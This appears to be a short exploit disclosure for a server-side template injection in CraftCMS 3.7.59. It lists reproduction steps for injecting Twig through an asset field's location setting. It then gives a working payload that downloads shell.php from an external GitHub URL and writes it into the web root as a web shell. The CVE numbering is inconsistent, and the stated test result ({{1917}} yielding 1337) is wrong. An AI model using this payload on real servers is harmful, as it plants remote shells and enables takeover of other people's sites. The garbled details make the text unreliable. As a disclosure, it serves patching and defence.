[CVE-2023-30178] Server-Side Template Injection

Exploit Author: Dat Nguyen aka datnlq of VietSunshine Cyber Security Services

Vendor of Product: CraftCMS

Affected Product Code Base: 3.7.59

CVE: CVE-2023-30179

Description: CraftCMS 3.7.59 is vulnerable of A Server-Side Template Injection (SSTI) vulnerability. An authenticated attacker can inject Twig Template to Default Asset Location field when creating new Field with Asset's field type, lead to Remote Code Execution.

Steps to reproduce:

  • Step 1: Go to Settings -> Fields, click New Field.Create new Asset's Field, inject Twig Template to Default Asset Location field, for example {{1917}}

  • Step 2: Create a new section. After that, Edit Entry Types of the section, at Field Layout field, add the Asset's Field that created at Step 1.

  • Step 3: Create new Entry in the section at step 3. Upload file to this entry

  • Step 4: Double click to the uploaded file, the result of Twig Template will show in Location field (result of {{1917}} is 1337

Exploit and payload:

SSTI_UserPhotoLocation_RCE{% set source=['https://raw.githubusercontent.com/datnlq/CraftCMS/main/shell.php']|map('file_get_contents')|join %} {{{(source):"/var/www/html/craft_cms/web/shell.php"}|map("file_put_contents")|join()}}

The way exploit same [CVE-2023-30179] Server-Side Template Injection

Last updated